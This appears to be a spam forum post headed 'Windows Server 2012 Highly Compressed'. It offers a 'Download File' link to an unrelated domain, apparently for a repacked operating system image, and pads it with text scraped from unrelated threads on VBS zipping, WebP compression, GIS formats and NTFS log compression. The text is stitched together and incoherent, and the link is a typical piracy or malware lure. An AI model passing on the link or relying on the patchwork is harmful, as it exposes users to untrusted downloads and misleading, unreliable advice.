Re: Windows Server 2012 Highly Compressed

0 views
Skip to first unread message
Message has been deleted

Ania Cozzolino

unread,
Jul 11, 2024, 6:41:26 PM7/11/24
to pothankwardtes

I've combined this script from several different sources to suit my needs better. Copy and paste the script into a file with the extension ".vbs". The script was originally made for Windows XP, but it also works in Windows 7 x64 Ultimate - no guarantee's if Windows will keep around the various Shell objects this uses.

windows server 2012 highly compressed


Download File https://lpoms.com/2yLA9W



(works on NTFS Volumes)File size after compression still displays same on CLI dir or GUI File Properties, but disk space occupied is (6-8 times) less.Binary compressed files won't make much difference.

For ZIP file format from PKWare, compression rate is about 4 times higher than compact (from testing on Win 10) and incorporates a range of compression algorithms such as Deflate, BZip, LZW, LZMA, LZ77, PPMd, etc

There is also a way to unzip the files via command line which I found as well. One way, just brings open an explorer window showing what the content of the zipped file is. Some of these also use Java which isn't necessarily native to windows but is so common that it nearly seems so.

Using the CopyHere() method in VBS introduces several issues. One of these issues is that the method returns immediately while the copy process starts in background whereas multiple CopyHere() calls will interfere each other and the ZIP won't be created correctly. A wait loop is needed here to fix that. My wait loop is based on an answer to a similar issue posted here.

Here is an updated version which fixes the "Object required" error reported by pihentagy. It's a timing issue as the newly created ZIP file is included in the Items collection when the script is executed on fast machines.

@rash Besides filesize, how does the visual quality of both images compare? Do the WebP images look better, worse or the same as the JPEG files? If you have a slightly larger filesize for a much better image, that might still be a good trade-off.

In fact, you'll want to generate multiple variants in different resolutions for different screen sizes. See my tutorial on using responsive images in ProcessWire for details. This one only talks about JPG, but you can use a element with two elements, one for WebP and one for JPEG.

Meanwhile I did a bit more testing and found a clear correlation to the JPG compression rate. In Photoshop, a quality setting of 70 (of 100) and better leads to fairly or even much smaller WebPs, while the saving decreases with lower quality until there happens a turnaround to even bigger WebPs, approximately at 60. (The Photoshop value 70 seems to correspond to 65 in Lightroom, a bit more than 80 in Affinity Photo and something around 90 in Pixelmator Pro. The "good" JPGs on server 1 were produced by Lightroom with setting 70 and therefore match the pattern.)

It doesn't matter how much you shrink your src image before you upload it, because every image manipulation requires loading the image COMPLETLY UNCOMPRESSED into the memory. That means, if you uploaded a 1000 x 600 px image with the lowest quality and with the highest compression (e.g. filesize 10kb) OR the exact same image with highest quality and none or lowest compression, 1000 x 600 px (filesize = 2 MB), results in the exact same memory image: 600 x 800 x 8 x 3 for sRGB colored images. So, the only difference is the resulting quality of any variation image. I highly advise(d) to use one of two possible strategies for the use of images in PW (or maybe any other CMS, too), depending of your use case:

B) If you want to further create variations from your uploaded image, then it is used as a master image that itself NEVER should or gets displayed to the FE. In this case the best results in all categories only can be achieved by uploading the highest possible quality (100% or quality-12 in photoshop). This is the best, because your compressing savings only have effects on uploaded bandwith/time and disk space usage, but also have visual quality loss AND, and that's real too, variations created from a 100% quality master image and the exact same 70% quality master image results in lesser file size for that derived from the 100% master. Explanation: Lossy image compression results in additional visual artefacts, which results in higher amounts of total color counts compared to the original image. When (re)loaded into memory again, for further manipulation / resizing, the compression algorithm has to deal with MORE single colors then before, and therefor the result is of higher filesize. (and lower visual quality).

Your real compression performance will probably depend a lot on the data you are putting in. Is it all geometries? If you have a lot of non-spatial data (or a lot of text attributes for spatial points), then it doesn't really matter what you do the geometries - you need to find some way to compress that data instead.

As others have said, I think you are going to struggle to find a format that meets your compression requirements. You would have to create your own custom format, which given your requirement to use commercial software is not going to be viable.

I think you need to possibly first consider how you can make your data models more efficient, then look at the compression aspects. For example, do you have a lot of repetition of geometry? You could then have a base set of geometry layers with unique IDs and then separate attribute data sets that reference the geometry by ID - that way you can have multiple views of the same geometry serving specific functions. Most decent software packages will then allow you to create joins or relates in order to create the unified view for a layer.

GML is a good example of a format that supports this kind of relational data model, though being a verbose format file sizes will be large. You can compress GML using gzip compression and can potentially get a 20:1 ratio but then you are relying on the software being able to support compressed GML.

Regardless, I would urge you to first look at your data models and see where there could be savings to be had. FME from Safe Software is your best bet if you need to start manipulating your data models.

To achieve that sort of ratio, you could use some sort of lossy compression, but I don't know of anything that uses it, and although I have a couple of ideas on how one might implement it, it would be far from standard. It would be much much cheaper to kit your server out with a 1TB disk than to spend time and money developing a custom solution.

You are also confusing data storage with data representation. Your 4th point mentions being able to view the data at different scales, but this is a function of your renderer, not the format per se. Again, a hypothetical lossily compressed file could store data at various resolutions in a sort of LoD structure, but that is likely to increase data size if anything.

If your data is to be on a server somewhere accessible by mobile applications, you're far better off using existing tools that have been designed for the purpose. A WFS server (such as GeoServer or MapServer) is ideally suited to this sort of application. The client makes a request for data of a specific area, normally that covered by the screen, and the WFS sends vector data for just that area, so all the heavy lifting is done by the server. It's then up to the application to render that data. An alternative would be to use the WMS features of MapServer and GeoServer, in which all the rendering is done by the server, and then it sends an image tile to the client. This enables features such as server-side caching of tiles, as well as scale-dependent rendering, with the minimum of work by you. They both read myriad formats, so you can author your data exactly how you like, and store it where you like, and they do all the cool stuff. Quantum GIS also has a WMS server, so you can author and serve data all in the same application.

We have a custom Windows Service in our production environment that for auditing and diagnostic reasons generates log files in the file system. The log files are quite verbose (by necessity) and produce about 100 Mb of output daily. The log contents must be retained for a 12-month period, but are highly compressible.

Are there any potential pitfalls or problems that we may encounter by doing this? Are there any performance, compatibility, or stability issues to be consider? If there are, how can we determine whether this is a good idea for us?

I've personally done this on the one Windows server I was in charge of. I think it's a good idea. As you mentioned, the repetitive plain text in log files compresses VERY well. The overhead involved with compression seemed pretty small. I used it for firewall logs, and easily dumped out 100MB+ per day. (although I had it broken into 20MB files) Unless your CPU is pegged to begin with, I don't think this would be a problem. You'll essentially trade a little bit of CPU power, for a great deal of disk space. Sometimes, that's an extremely good tradeoff. Other times, notsomuch.

Obviously, testing is a good idea. But I didn't run into too many troubles. Just be advised the compression isn't transferrable, like an old fashioned zip file. So if you move this via FTP/CIFS/etc, you're moving the uncompressed amount. If you copy them outside of the compressed folder, you're moving the uncompressed amount. If you use backup software, you're backing up the uncompressed amount. Etc.

Might be worth noting there is the initial compression when you actually flip the flag for this folder. So you might want to compress a subset at a time, so you don't bring your server to it's knees while it compresses your logs for an hour. This may be significant depending on how much log info you have, and how important your application is. But all that being said, you can always reverse the process, and uncompress the directory just as easily. So if you find performance is too crappy, then you can always* flip it back.

7fc3f7cf58
Reply all
Reply to author
Forward
0 new messages